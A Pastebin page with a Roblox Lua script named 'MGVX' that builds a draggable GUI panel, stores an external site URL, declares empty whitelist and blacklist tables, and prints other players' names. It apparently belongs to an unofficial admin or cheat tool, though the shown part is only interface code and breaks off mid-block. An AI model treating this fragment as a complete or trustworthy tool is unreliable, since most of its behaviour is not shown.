Advertisement
jech

Untitled

Jun 16th, 2016
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 78.56 KB | None | 0 0
  1. local CoreValues = Instance.new("Folder")
  2. CoreValues.Name = "MGVXCore"
  3. CoreValues.Parent = game
  4.  
  5.  
  6. local Http = game:GetService("HttpService")
  7. local gWorkspace = game:GetService("Workspace")
  8. local OwnerGui = game:GetService("Players").LocalPlayer.PlayerGui
  9. local Players = game:GetService("Players")
  10. local Website = "http://mgvx.tk/"
  11.  
  12. -- Makes Sure EveryThing Goes Ok!---
  13. print("MGVX LOADED")
  14.  
  15.  
  16. --------
  17. local WhiteList = {}
  18. local BlackListed = {}
  19. local Others = {}
  20.  
  21. -- Variables---
  22.  
  23. Owner = game.Players.LocalPlayer
  24. local plr = game.Players.LocalPlayer
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31. for i,v in pairs(game.Players:GetChildren()) do
  32. local ip = game.Players:GetChildren()
  33. if v ~= plr then
  34. table.insert(Others, v.Name)
  35. end end
  36.  
  37. for i,v in pairs(Others) do
  38. if v then otherp = v end
  39. end
  40. print(otherp)
  41. print(Others[1])
  42. print(Others[2])
  43. print(Others[3])
  44. print(Others[4])
  45. print(Others[5])
  46. print(Others[6])
  47. print(Others[7])
  48. print(Others[8])
  49. print(Others[9])
  50. print(Others[10])
  51. print(Others[11])
  52. print(Others[1])
  53. print(Others[12])
  54. print(Others[13])
  55. print(Others[14])
  56. print(Others[1])
  57.  
  58.  
  59. local NewGuiPart1 = Instance.new("ScreenGui")
  60. NewGuiPart1.Name = "MGVX"
  61. NewGuiPart1.Parent = Owner.PlayerGui
  62.  
  63.  
  64.  
  65. -------
  66. local NewGuiPart2 = Instance.new("Frame")
  67. NewGuiPart2.Active = true
  68. NewGuiPart2.Position = UDim2.new(0.368000001, 0, 0.0829999968, 0)
  69. NewGuiPart2.Size = UDim2.new(0, 300, 0, 350)
  70. NewGuiPart2.Style = Enum.FrameStyle.DropShadow
  71. NewGuiPart2.ClipsDescendants = true
  72. NewGuiPart2.Draggable = true
  73. NewGuiPart2.Parent = NewGuiPart1
  74. -------
  75. local NewGuiPart3 = Instance.new("TextButton")
  76. NewGuiPart3.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  77. NewGuiPart3.BackgroundTransparency = 0.69999998807907
  78. NewGuiPart3.BorderColor3 = Color3.new(0, 0, 0)
  79. NewGuiPart3.BorderSizePixel = 0
  80. NewGuiPart3.Name = "TL1"
  81. NewGuiPart3.Position = UDim2.new(0, 200, 0, 0)
  82. NewGuiPart3.Selectable = true
  83. NewGuiPart3.Size = UDim2.new(0, 80, 0, 20)
  84. NewGuiPart3.Style = Enum.ButtonStyle.Custom
  85. NewGuiPart3.FontSize = Enum.FontSize.Size14
  86. NewGuiPart3.Text = "Refresh"
  87. NewGuiPart3.TextColor3 = Color3.new(1, 1, 1)
  88. NewGuiPart3.Parent = NewGuiPart2
  89. -------
  90. local NewGuiPart4 = Instance.new("TextLabel")
  91. NewGuiPart4.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  92. NewGuiPart4.BackgroundTransparency = 1
  93. NewGuiPart4.BorderColor3 = Color3.new(0, 0, 0)
  94. NewGuiPart4.BorderSizePixel = 0
  95. NewGuiPart4.Name = "TL2"
  96. NewGuiPart4.Position = UDim2.new(0, 50, 0, 0)
  97. NewGuiPart4.Size = UDim2.new(0, 80, 0, 20)
  98. NewGuiPart4.FontSize = Enum.FontSize.Size14
  99. NewGuiPart4.Text = "Loading..."
  100. NewGuiPart4.TextColor3 = Color3.new(1, 1, 1)
  101. NewGuiPart4.TextScaled = true
  102. NewGuiPart4.TextWrapped = true
  103. NewGuiPart4.Parent = NewGuiPart2
  104. -------
  105. local NewGuiPart5 = Instance.new("Frame")
  106. NewGuiPart5.BackgroundColor3 = Color3.new(0, 0, 0)
  107. NewGuiPart5.BackgroundTransparency = 1
  108. NewGuiPart5.BorderSizePixel = 5
  109. NewGuiPart5.Name = "Main"
  110. NewGuiPart5.Position = UDim2.new(1, -280, 0.0829999968, 0)
  111. NewGuiPart5.Size = UDim2.new(0, 250, 0, 300)
  112. NewGuiPart5.Visible = false
  113. NewGuiPart5.Draggable = true
  114. NewGuiPart5.Parent = NewGuiPart2
  115. -------
  116. local NewGuiPart6 = Instance.new("ScrollingFrame")
  117. NewGuiPart6.BackgroundTransparency = 1
  118. NewGuiPart6.Name = "PlayerList"
  119. NewGuiPart6.Position = UDim2.new(0, -7, 0, -10)
  120. NewGuiPart6.Selectable = true
  121. NewGuiPart6.Size = UDim2.new(0, 290, 0, 320)
  122. NewGuiPart6.ClipsDescendants = true
  123. NewGuiPart6.Parent = NewGuiPart5
  124. -------
  125. local NewGuiPart7 = Instance.new("Frame")
  126. NewGuiPart7.BackgroundColor3 = Color3.new(0, 0, 0)
  127. NewGuiPart7.BackgroundTransparency = 1
  128. NewGuiPart7.BorderSizePixel = 0
  129. NewGuiPart7.Size = UDim2.new(0, 290, 0, 35)
  130. NewGuiPart7.Parent = NewGuiPart6
  131. -------
  132. local NewGuiPart8 = Instance.new("ImageLabel")
  133. NewGuiPart8.Active = false
  134. NewGuiPart8.BackgroundTransparency = 1
  135. NewGuiPart8.BorderSizePixel = 0
  136. NewGuiPart8.Position = UDim2.new(0, 10, 0, 15)
  137. NewGuiPart8.Selectable = false
  138. NewGuiPart8.Size = UDim2.new(0, 65, 0, 25)
  139. NewGuiPart8.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username=ROBLOX"
  140. NewGuiPart8.Parent = NewGuiPart7
  141. -------
  142. local NewGuiPart9 = Instance.new("TextLabel")
  143. NewGuiPart9.BackgroundTransparency = 1
  144. NewGuiPart9.BorderSizePixel = 0
  145. NewGuiPart9.Position = UDim2.new(0, 100, 0, 15)
  146. NewGuiPart9.Size = UDim2.new(0, 100, 0, 25)
  147. NewGuiPart9.Font = Enum.Font.Legacy
  148. NewGuiPart9.FontSize = Enum.FontSize.Size10
  149. NewGuiPart9.Text = ""
  150. NewGuiPart9.TextColor3 = Color3.new(1, 1, 1)
  151. NewGuiPart9.TextScaled = true
  152. NewGuiPart9.TextWrapped = true
  153. NewGuiPart9.Parent = NewGuiPart7
  154. -------
  155. local NewGuiPart10 = Instance.new("Frame")
  156. NewGuiPart10.BackgroundColor3 = Color3.new(0, 0, 0)
  157. NewGuiPart10.BackgroundTransparency = 1
  158. NewGuiPart10.BorderSizePixel = 0
  159. NewGuiPart10.Position = UDim2.new(0, 0, 0, 35)
  160. NewGuiPart10.Size = UDim2.new(0, 290, 0, 35)
  161. NewGuiPart10.Parent = NewGuiPart6
  162. -------
  163. local NewGuiPart11 = Instance.new("ImageLabel")
  164. NewGuiPart11.Active = false
  165. NewGuiPart11.BackgroundTransparency = 1
  166. NewGuiPart11.BorderSizePixel = 0
  167. NewGuiPart11.Position = UDim2.new(0, 10, 0, 15)
  168. NewGuiPart11.Selectable = false
  169. NewGuiPart11.Size = UDim2.new(0, 65, 0, 25)
  170. NewGuiPart11.Image = ""
  171. NewGuiPart11.Parent = NewGuiPart10
  172. -------
  173. local NewGuiPart12 = Instance.new("TextLabel")
  174. NewGuiPart12.BackgroundTransparency = 1
  175. NewGuiPart12.BorderSizePixel = 0
  176. NewGuiPart12.Position = UDim2.new(0, 100, 0, 15)
  177. NewGuiPart12.Size = UDim2.new(0, 100, 0, 25)
  178. NewGuiPart12.Font = Enum.Font.Legacy
  179. NewGuiPart12.FontSize = Enum.FontSize.Size10
  180. NewGuiPart12.Text = ""
  181. NewGuiPart12.TextColor3 = Color3.new(1, 1, 1)
  182. NewGuiPart12.TextScaled = true
  183. NewGuiPart12.TextWrapped = true
  184. NewGuiPart12.Parent = NewGuiPart10
  185. -------
  186. local NewGuiPart13 = Instance.new("Frame")
  187. NewGuiPart13.BackgroundColor3 = Color3.new(0, 0, 0)
  188. NewGuiPart13.BackgroundTransparency = 1
  189. NewGuiPart13.BorderSizePixel = 0
  190. NewGuiPart13.Position = UDim2.new(0, 0, 0, 70)
  191. NewGuiPart13.Size = UDim2.new(0, 290, 0, 35)
  192. NewGuiPart13.Parent = NewGuiPart6
  193. -------
  194. local NewGuiPart14 = Instance.new("ImageLabel")
  195. NewGuiPart14.Active = false
  196. NewGuiPart14.BackgroundTransparency = 1
  197. NewGuiPart14.BorderSizePixel = 0
  198. NewGuiPart14.Position = UDim2.new(0, 10, 0, 15)
  199. NewGuiPart14.Selectable = false
  200. NewGuiPart14.Size = UDim2.new(0, 65, 0, 25)
  201. NewGuiPart14.Image = ""
  202. NewGuiPart14.Image = ""
  203. NewGuiPart14.Parent = NewGuiPart13
  204. -------
  205. local NewGuiPart15 = Instance.new("TextLabel")
  206. NewGuiPart15.BackgroundTransparency = 1
  207. NewGuiPart15.BorderSizePixel = 0
  208. NewGuiPart15.Position = UDim2.new(0, 100, 0, 15)
  209. NewGuiPart15.Size = UDim2.new(0, 100, 0, 25)
  210. NewGuiPart15.Font = Enum.Font.Legacy
  211. NewGuiPart15.FontSize = Enum.FontSize.Size10
  212. NewGuiPart15.Text = ""
  213. NewGuiPart15.TextColor3 = Color3.new(1, 1, 1)
  214. NewGuiPart15.TextScaled = true
  215. NewGuiPart15.TextWrapped = true
  216. NewGuiPart15.Parent = NewGuiPart13
  217. -------
  218. local NewGuiPart16 = Instance.new("Frame")
  219. NewGuiPart16.BackgroundColor3 = Color3.new(0, 0, 0)
  220. NewGuiPart16.BackgroundTransparency = 1
  221. NewGuiPart16.BorderSizePixel = 0
  222. NewGuiPart16.Position = UDim2.new(0, 0, 0, 105)
  223. NewGuiPart16.Size = UDim2.new(0, 290, 0, 35)
  224. NewGuiPart16.Parent = NewGuiPart6
  225. -------
  226. local NewGuiPart17 = Instance.new("ImageLabel")
  227. NewGuiPart17.Active = false
  228. NewGuiPart17.BackgroundTransparency = 1
  229. NewGuiPart17.BorderSizePixel = 0
  230. NewGuiPart17.Position = UDim2.new(0, 10, 0, 15)
  231. NewGuiPart17.Selectable = false
  232. NewGuiPart17.Size = UDim2.new(0, 65, 0, 25)
  233. NewGuiPart17.Image = ""
  234. NewGuiPart17.Image = ""
  235. NewGuiPart17.Parent = NewGuiPart16
  236. -------
  237. local NewGuiPart18 = Instance.new("TextLabel")
  238. NewGuiPart18.BackgroundTransparency = 1
  239. NewGuiPart18.BorderSizePixel = 0
  240. NewGuiPart18.Position = UDim2.new(0, 100, 0, 15)
  241. NewGuiPart18.Size = UDim2.new(0, 100, 0, 25)
  242. NewGuiPart18.Font = Enum.Font.Legacy
  243. NewGuiPart18.FontSize = Enum.FontSize.Size10
  244. NewGuiPart18.Text = ""
  245. NewGuiPart18.TextColor3 = Color3.new(1, 1, 1)
  246. NewGuiPart18.TextScaled = true
  247. NewGuiPart18.TextWrapped = true
  248. NewGuiPart18.Parent = NewGuiPart16
  249. -------
  250. local NewGuiPart19 = Instance.new("Frame")
  251. NewGuiPart19.BackgroundColor3 = Color3.new(0, 0, 0)
  252. NewGuiPart19.BackgroundTransparency = 1
  253. NewGuiPart19.BorderSizePixel = 0
  254. NewGuiPart19.Position = UDim2.new(0, 0, 0, 140)
  255. NewGuiPart19.Size = UDim2.new(0, 290, 0, 35)
  256. NewGuiPart19.Parent = NewGuiPart6
  257. -------
  258. local NewGuiPart20 = Instance.new("ImageLabel")
  259. NewGuiPart20.Active = false
  260. NewGuiPart20.BackgroundTransparency = 1
  261. NewGuiPart20.BorderSizePixel = 0
  262. NewGuiPart20.Position = UDim2.new(0, 10, 0, 15)
  263. NewGuiPart20.Selectable = false
  264. NewGuiPart20.Size = UDim2.new(0, 65, 0, 25)
  265. NewGuiPart20.Image = ""
  266. NewGuiPart20.Image = ""
  267. NewGuiPart20.Parent = NewGuiPart19
  268. -------
  269. local NewGuiPart21 = Instance.new("TextLabel")
  270. NewGuiPart21.BackgroundTransparency = 1
  271. NewGuiPart21.BorderSizePixel = 0
  272. NewGuiPart21.Position = UDim2.new(0, 100, 0, 15)
  273. NewGuiPart21.Size = UDim2.new(0, 100, 0, 25)
  274. NewGuiPart21.Font = Enum.Font.Legacy
  275. NewGuiPart21.FontSize = Enum.FontSize.Size10
  276. NewGuiPart21.Text = ""
  277. NewGuiPart21.TextColor3 = Color3.new(1, 1, 1)
  278. NewGuiPart21.TextScaled = true
  279. NewGuiPart21.TextWrapped = true
  280. NewGuiPart21.Parent = NewGuiPart19
  281. -------
  282. local NewGuiPart22 = Instance.new("Frame")
  283. NewGuiPart22.BackgroundColor3 = Color3.new(0, 0, 0)
  284. NewGuiPart22.BackgroundTransparency = 1
  285. NewGuiPart22.BorderSizePixel = 0
  286. NewGuiPart22.Position = UDim2.new(0, 0, 0, 175)
  287. NewGuiPart22.Size = UDim2.new(0, 290, 0, 35)
  288. NewGuiPart22.Parent = NewGuiPart6
  289. -------
  290. local NewGuiPart23 = Instance.new("ImageLabel")
  291. NewGuiPart23.Active = false
  292. NewGuiPart23.BackgroundTransparency = 1
  293. NewGuiPart23.BorderSizePixel = 0
  294. NewGuiPart23.Position = UDim2.new(0, 10, 0, 15)
  295. NewGuiPart23.Selectable = false
  296. NewGuiPart23.Size = UDim2.new(0, 65, 0, 25)
  297. NewGuiPart23.Image = ""
  298. NewGuiPart23.Image = ""
  299. NewGuiPart23.Parent = NewGuiPart22
  300. -------
  301. local NewGuiPart24 = Instance.new("TextLabel")
  302. NewGuiPart24.BackgroundTransparency = 1
  303. NewGuiPart24.BorderSizePixel = 0
  304. NewGuiPart24.Position = UDim2.new(0, 100, 0, 15)
  305. NewGuiPart24.Size = UDim2.new(0, 100, 0, 25)
  306. NewGuiPart24.Font = Enum.Font.Legacy
  307. NewGuiPart24.FontSize = Enum.FontSize.Size10
  308. NewGuiPart24.Text = ""
  309. NewGuiPart24.TextColor3 = Color3.new(1, 1, 1)
  310. NewGuiPart24.TextScaled = true
  311. NewGuiPart24.TextWrapped = true
  312. NewGuiPart24.Parent = NewGuiPart22
  313. -------
  314. local NewGuiPart25 = Instance.new("Frame")
  315. NewGuiPart25.BackgroundColor3 = Color3.new(0, 0, 0)
  316. NewGuiPart25.BackgroundTransparency = 1
  317. NewGuiPart25.BorderSizePixel = 0
  318. NewGuiPart25.Position = UDim2.new(0, 0, 0, 205)
  319. NewGuiPart25.Size = UDim2.new(0, 290, 0, 35)
  320. NewGuiPart25.Parent = NewGuiPart6
  321. -------
  322. local NewGuiPart26 = Instance.new("ImageLabel")
  323. NewGuiPart26.Active = false
  324. NewGuiPart26.BackgroundTransparency = 1
  325. NewGuiPart26.BorderSizePixel = 0
  326. NewGuiPart26.Position = UDim2.new(0, 10, 0, 15)
  327. NewGuiPart26.Selectable = false
  328. NewGuiPart26.Size = UDim2.new(0, 65, 0, 25)
  329. NewGuiPart26.Image = ""
  330. NewGuiPart26.Image = ""
  331. NewGuiPart26.Parent = NewGuiPart25
  332. -------
  333. local NewGuiPart27 = Instance.new("TextLabel")
  334. NewGuiPart27.BackgroundTransparency = 1
  335. NewGuiPart27.BorderSizePixel = 0
  336. NewGuiPart27.Position = UDim2.new(0, 100, 0, 15)
  337. NewGuiPart27.Size = UDim2.new(0, 100, 0, 25)
  338. NewGuiPart27.Font = Enum.Font.Legacy
  339. NewGuiPart27.FontSize = Enum.FontSize.Size10
  340. NewGuiPart27.Text = ""
  341. NewGuiPart27.TextColor3 = Color3.new(1, 1, 1)
  342. NewGuiPart27.TextScaled = true
  343. NewGuiPart27.TextWrapped = true
  344. NewGuiPart27.Parent = NewGuiPart25
  345. -------
  346. local NewGuiPart28 = Instance.new("Frame")
  347. NewGuiPart28.BackgroundColor3 = Color3.new(0, 0, 0)
  348. NewGuiPart28.BackgroundTransparency = 1
  349. NewGuiPart28.BorderSizePixel = 0
  350. NewGuiPart28.Position = UDim2.new(0, 0, 0, 240)
  351. NewGuiPart28.Size = UDim2.new(0, 290, 0, 35)
  352. NewGuiPart28.Parent = NewGuiPart6
  353. -------
  354. local NewGuiPart29 = Instance.new("ImageLabel")
  355. NewGuiPart29.Active = false
  356. NewGuiPart29.BackgroundTransparency = 1
  357. NewGuiPart29.BorderSizePixel = 0
  358. NewGuiPart29.Position = UDim2.new(0, 10, 0, 15)
  359. NewGuiPart29.Selectable = false
  360. NewGuiPart29.Size = UDim2.new(0, 65, 0, 25)
  361. NewGuiPart29.Image = ""
  362. NewGuiPart29.Image = ""
  363. NewGuiPart29.Parent = NewGuiPart28
  364. -------
  365. local NewGuiPart30 = Instance.new("TextLabel")
  366. NewGuiPart30.BackgroundTransparency = 1
  367. NewGuiPart30.BorderSizePixel = 0
  368. NewGuiPart30.Position = UDim2.new(0, 100, 0, 15)
  369. NewGuiPart30.Size = UDim2.new(0, 100, 0, 25)
  370. NewGuiPart30.Font = Enum.Font.Legacy
  371. NewGuiPart30.FontSize = Enum.FontSize.Size10
  372. NewGuiPart30.Text = ""
  373. NewGuiPart30.TextColor3 = Color3.new(1, 1, 1)
  374. NewGuiPart30.TextScaled = true
  375. NewGuiPart30.TextWrapped = true
  376. NewGuiPart30.Parent = NewGuiPart28
  377. -------
  378. local NewGuiPart31 = Instance.new("Frame")
  379. NewGuiPart31.BackgroundColor3 = Color3.new(0, 0, 0)
  380. NewGuiPart31.BackgroundTransparency = 1
  381. NewGuiPart31.BorderSizePixel = 0
  382. NewGuiPart31.Position = UDim2.new(0, 0, 0, 275)
  383. NewGuiPart31.Size = UDim2.new(0, 290, 0, 35)
  384. NewGuiPart31.Parent = NewGuiPart6
  385. -------
  386. local NewGuiPart32 = Instance.new("ImageLabel")
  387. NewGuiPart32.Active = false
  388. NewGuiPart32.BackgroundTransparency = 1
  389. NewGuiPart32.BorderSizePixel = 0
  390. NewGuiPart32.Position = UDim2.new(0, 10, 0, 15)
  391. NewGuiPart32.Selectable = false
  392. NewGuiPart32.Size = UDim2.new(0, 65, 0, 25)
  393. NewGuiPart32.Image = ""
  394. NewGuiPart32.Image = ""
  395. NewGuiPart32.Parent = NewGuiPart31
  396. -------
  397. local NewGuiPart33 = Instance.new("TextLabel")
  398. NewGuiPart33.BackgroundTransparency = 1
  399. NewGuiPart33.BorderSizePixel = 0
  400. NewGuiPart33.Position = UDim2.new(0, 100, 0, 15)
  401. NewGuiPart33.Size = UDim2.new(0, 100, 0, 25)
  402. NewGuiPart33.Font = Enum.Font.Legacy
  403. NewGuiPart33.FontSize = Enum.FontSize.Size10
  404. NewGuiPart33.Text = ""
  405. NewGuiPart33.TextColor3 = Color3.new(1, 1, 1)
  406. NewGuiPart33.TextScaled = true
  407. NewGuiPart33.TextWrapped = true
  408. NewGuiPart33.Parent = NewGuiPart31
  409. -------
  410. local NewGuiPart34 = Instance.new("Frame")
  411. NewGuiPart34.BackgroundColor3 = Color3.new(0, 0, 0)
  412. NewGuiPart34.BackgroundTransparency = 1
  413. NewGuiPart34.BorderSizePixel = 0
  414. NewGuiPart34.Position = UDim2.new(0, 0, 0, 305)
  415. NewGuiPart34.Size = UDim2.new(0, 290, 0, 35)
  416. NewGuiPart34.Parent = NewGuiPart6
  417. -------
  418. local NewGuiPart35 = Instance.new("ImageLabel")
  419. NewGuiPart35.Active = false
  420. NewGuiPart35.BackgroundTransparency = 1
  421. NewGuiPart35.BorderSizePixel = 0
  422. NewGuiPart35.Position = UDim2.new(0, 10, 0, 15)
  423. NewGuiPart35.Selectable = false
  424. NewGuiPart35.Size = UDim2.new(0, 65, 0, 25)
  425. NewGuiPart35.Image = ""
  426. NewGuiPart35.Image = ""
  427. NewGuiPart35.Parent = NewGuiPart34
  428. -------
  429. local NewGuiPart36 = Instance.new("TextLabel")
  430. NewGuiPart36.BackgroundTransparency = 1
  431. NewGuiPart36.BorderSizePixel = 0
  432. NewGuiPart36.Position = UDim2.new(0, 100, 0, 15)
  433. NewGuiPart36.Size = UDim2.new(0, 100, 0, 25)
  434. NewGuiPart36.Font = Enum.Font.Legacy
  435. NewGuiPart36.FontSize = Enum.FontSize.Size10
  436. NewGuiPart36.Text = ""
  437. NewGuiPart36.TextColor3 = Color3.new(1, 1, 1)
  438. NewGuiPart36.TextScaled = true
  439. NewGuiPart36.TextWrapped = true
  440. NewGuiPart36.Parent = NewGuiPart34
  441. -------
  442. local NewGuiPart37 = Instance.new("Frame")
  443. NewGuiPart37.BackgroundColor3 = Color3.new(0, 0, 0)
  444. NewGuiPart37.BackgroundTransparency = 1
  445. NewGuiPart37.BorderSizePixel = 0
  446. NewGuiPart37.Position = UDim2.new(0, 0, 0, 345)
  447. NewGuiPart37.Size = UDim2.new(0, 290, 0, 35)
  448. NewGuiPart37.Parent = NewGuiPart6
  449. -------
  450. local NewGuiPart38 = Instance.new("ImageLabel")
  451. NewGuiPart38.Active = false
  452. NewGuiPart38.BackgroundTransparency = 1
  453. NewGuiPart38.BorderSizePixel = 0
  454. NewGuiPart38.Position = UDim2.new(0, 10, 0, 15)
  455. NewGuiPart38.Selectable = false
  456. NewGuiPart38.Size = UDim2.new(0, 65, 0, 25)
  457. NewGuiPart38.Image = ""
  458. NewGuiPart38.Image = ""
  459. NewGuiPart38.Parent = NewGuiPart37
  460. -------
  461. local NewGuiPart39 = Instance.new("TextLabel")
  462. NewGuiPart39.BackgroundTransparency = 1
  463. NewGuiPart39.BorderSizePixel = 0
  464. NewGuiPart39.Position = UDim2.new(0, 100, 0, 15)
  465. NewGuiPart39.Size = UDim2.new(0, 100, 0, 25)
  466. NewGuiPart39.Font = Enum.Font.Legacy
  467. NewGuiPart39.FontSize = Enum.FontSize.Size10
  468. NewGuiPart39.Text = ""
  469. NewGuiPart39.TextColor3 = Color3.new(1, 1, 1)
  470. NewGuiPart39.TextScaled = true
  471. NewGuiPart39.TextWrapped = true
  472. NewGuiPart39.Parent = NewGuiPart37
  473. -------
  474. local NewGuiPart40 = Instance.new("Frame")
  475. NewGuiPart40.BackgroundColor3 = Color3.new(0, 0, 0)
  476. NewGuiPart40.BackgroundTransparency = 1
  477. NewGuiPart40.BorderSizePixel = 0
  478. NewGuiPart40.Position = UDim2.new(0, 0, 0, 375)
  479. NewGuiPart40.Size = UDim2.new(0, 290, 0, 35)
  480. NewGuiPart40.Parent = NewGuiPart6
  481. -------
  482. local NewGuiPart41 = Instance.new("ImageLabel")
  483. NewGuiPart41.Active = false
  484. NewGuiPart41.BackgroundTransparency = 1
  485. NewGuiPart41.BorderSizePixel = 0
  486. NewGuiPart41.Position = UDim2.new(0, 10, 0, 15)
  487. NewGuiPart41.Selectable = false
  488. NewGuiPart41.Size = UDim2.new(0, 65, 0, 25)
  489. NewGuiPart41.Image = ""
  490. NewGuiPart41.Image = ""
  491. NewGuiPart41.Parent = NewGuiPart40
  492. -------
  493. local NewGuiPart42 = Instance.new("TextLabel")
  494. NewGuiPart42.BackgroundTransparency = 1
  495. NewGuiPart42.BorderSizePixel = 0
  496. NewGuiPart42.Position = UDim2.new(0, 100, 0, 15)
  497. NewGuiPart42.Size = UDim2.new(0, 100, 0, 25)
  498. NewGuiPart42.Font = Enum.Font.Legacy
  499. NewGuiPart42.FontSize = Enum.FontSize.Size10
  500. NewGuiPart42.Text = ""
  501. NewGuiPart42.TextColor3 = Color3.new(1, 1, 1)
  502. NewGuiPart42.TextScaled = true
  503. NewGuiPart42.TextWrapped = true
  504. NewGuiPart42.Parent = NewGuiPart40
  505. -------
  506. local NewGuiPart43 = Instance.new("Frame")
  507. NewGuiPart43.BackgroundColor3 = Color3.new(0, 0, 0)
  508. NewGuiPart43.BackgroundTransparency = 1
  509. NewGuiPart43.BorderSizePixel = 0
  510. NewGuiPart43.Position = UDim2.new(0, 0, 0, 405)
  511. NewGuiPart43.Size = UDim2.new(0, 290, 0, 35)
  512. NewGuiPart43.Parent = NewGuiPart6
  513. -------
  514. local NewGuiPart44 = Instance.new("ImageLabel")
  515. NewGuiPart44.Active = false
  516. NewGuiPart44.BackgroundTransparency = 1
  517. NewGuiPart44.BorderSizePixel = 0
  518. NewGuiPart44.Position = UDim2.new(0, 10, 0, 15)
  519. NewGuiPart44.Selectable = false
  520. NewGuiPart44.Size = UDim2.new(0, 65, 0, 25)
  521. NewGuiPart44.Image = ""
  522. NewGuiPart44.Image = ""
  523. NewGuiPart44.Parent = NewGuiPart43
  524. -------
  525. local NewGuiPart45 = Instance.new("TextLabel")
  526. NewGuiPart45.BackgroundTransparency = 1
  527. NewGuiPart45.BorderSizePixel = 0
  528. NewGuiPart45.Position = UDim2.new(0, 100, 0, 15)
  529. NewGuiPart45.Size = UDim2.new(0, 100, 0, 25)
  530. NewGuiPart45.Font = Enum.Font.Legacy
  531. NewGuiPart45.FontSize = Enum.FontSize.Size10
  532. NewGuiPart45.Text = ""
  533. NewGuiPart45.TextColor3 = Color3.new(1, 1, 1)
  534. NewGuiPart45.TextScaled = true
  535. NewGuiPart45.TextWrapped = true
  536. NewGuiPart45.Parent = NewGuiPart43
  537. -------
  538. local NewGuiPart46 = Instance.new("Frame")
  539. NewGuiPart46.BackgroundColor3 = Color3.new(0, 0, 0)
  540. NewGuiPart46.BackgroundTransparency = 1
  541. NewGuiPart46.BorderSizePixel = 0
  542. NewGuiPart46.Position = UDim2.new(0, 0, 0, 445)
  543. NewGuiPart46.Size = UDim2.new(0, 290, 0, 35)
  544. NewGuiPart46.Parent = NewGuiPart6
  545. -------
  546. local NewGuiPart47 = Instance.new("ImageLabel")
  547. NewGuiPart47.Active = false
  548. NewGuiPart47.BackgroundTransparency = 1
  549. NewGuiPart47.BorderSizePixel = 0
  550. NewGuiPart47.Position = UDim2.new(0, 10, 0, 15)
  551. NewGuiPart47.Selectable = false
  552. NewGuiPart47.Size = UDim2.new(0, 65, 0, 25)
  553. NewGuiPart47.Image = ""
  554. NewGuiPart47.Image = ""
  555. NewGuiPart47.Parent = NewGuiPart46
  556. -------
  557. local NewGuiPart48 = Instance.new("TextLabel")
  558. NewGuiPart48.BackgroundTransparency = 1
  559. NewGuiPart48.BorderSizePixel = 0
  560. NewGuiPart48.Position = UDim2.new(0, 100, 0, 15)
  561. NewGuiPart48.Size = UDim2.new(0, 100, 0, 25)
  562. NewGuiPart48.Font = Enum.Font.Legacy
  563. NewGuiPart48.FontSize = Enum.FontSize.Size10
  564. NewGuiPart48.Text = ""
  565. NewGuiPart48.TextColor3 = Color3.new(1, 1, 1)
  566. NewGuiPart48.TextScaled = true
  567. NewGuiPart48.TextWrapped = true
  568. NewGuiPart48.Parent = NewGuiPart46
  569. -------
  570. local NewGuiPart49 = Instance.new("TextButton")
  571. NewGuiPart49.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  572. NewGuiPart49.BackgroundTransparency = 0.69999998807907
  573. NewGuiPart49.BorderColor3 = Color3.new(0, 0, 0)
  574. NewGuiPart49.BorderSizePixel = 0
  575. NewGuiPart49.Name = "TL3"
  576. NewGuiPart49.Position = UDim2.new(0, 200, 0, 25)
  577. NewGuiPart49.Selectable = true
  578. NewGuiPart49.Size = UDim2.new(0, 80, 0, 20)
  579. NewGuiPart49.Style = Enum.ButtonStyle.Custom
  580. NewGuiPart49.FontSize = Enum.FontSize.Size14
  581. NewGuiPart49.Text = "Settings"
  582. NewGuiPart49.TextColor3 = Color3.new(1, 1, 1)
  583. NewGuiPart49.Parent = NewGuiPart2
  584. -------
  585. local NewGuiPart50 = Instance.new("Frame")
  586. NewGuiPart50.BackgroundTransparency = 1
  587. NewGuiPart50.Name = "ScrollingFrame"
  588. NewGuiPart50.Position = UDim2.new(0, 0, 0, 50)
  589. NewGuiPart50.Size = UDim2.new(0, 290, 0, 280)
  590. NewGuiPart50.Visible = false
  591. NewGuiPart50.ClipsDescendants = true
  592. NewGuiPart50.Draggable = true
  593. NewGuiPart50.Parent = NewGuiPart2
  594.  
  595. -------
  596. local NewGuiPart52 = Instance.new("TextBox")
  597. NewGuiPart52.Active = false
  598. NewGuiPart52.BackgroundTransparency = 0.5
  599. NewGuiPart52.BorderColor3 = Color3.new(0, 0, 0)
  600. NewGuiPart52.BorderSizePixel = 0
  601. NewGuiPart52.Name = "TB1"
  602. NewGuiPart52.Position = UDim2.new(0, 90, 0, 100)
  603. NewGuiPart52.Size = UDim2.new(0, 180, 0, 20)
  604. NewGuiPart52.FontSize = Enum.FontSize.Size18
  605. NewGuiPart52.Text = ""
  606. NewGuiPart52.TextColor3 = Color3.new(1, 1, 1)
  607. NewGuiPart52.TextWrapped = true
  608. NewGuiPart52.Parent = NewGuiPart50
  609. -------
  610. local NewGuiPart53 = Instance.new("TextButton")
  611. NewGuiPart53.BackgroundColor3 = Color3.new(0.972549, 0.972549, 0.972549)
  612. NewGuiPart53.BackgroundTransparency = 0.5
  613. NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0)
  614. NewGuiPart53.BorderSizePixel = 0
  615. NewGuiPart53.Name = "TB"
  616. NewGuiPart53.Position = UDim2.new(0, 50, 0, 250)
  617. NewGuiPart53.Selectable = true
  618. NewGuiPart53.Size = UDim2.new(0, 180, 0, 20)
  619. NewGuiPart53.Style = Enum.ButtonStyle.Custom
  620. NewGuiPart53.FontSize = Enum.FontSize.Size18
  621. NewGuiPart53.Text = "Save"
  622. NewGuiPart53.TextColor3 = Color3.new(0, 0, 0)
  623. NewGuiPart53.TextWrapped = true
  624. NewGuiPart53.Parent = NewGuiPart50
  625.  
  626. -------
  627. local NewGuiPart55 = Instance.new("TextLabel")
  628. NewGuiPart55.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  629. NewGuiPart55.BackgroundTransparency = 1
  630. NewGuiPart55.BorderColor3 = Color3.new(0, 0, 0)
  631. NewGuiPart55.BorderSizePixel = 0
  632. NewGuiPart55.Name = "TL2"
  633. NewGuiPart55.Position = UDim2.new(0, 0, 0, 100)
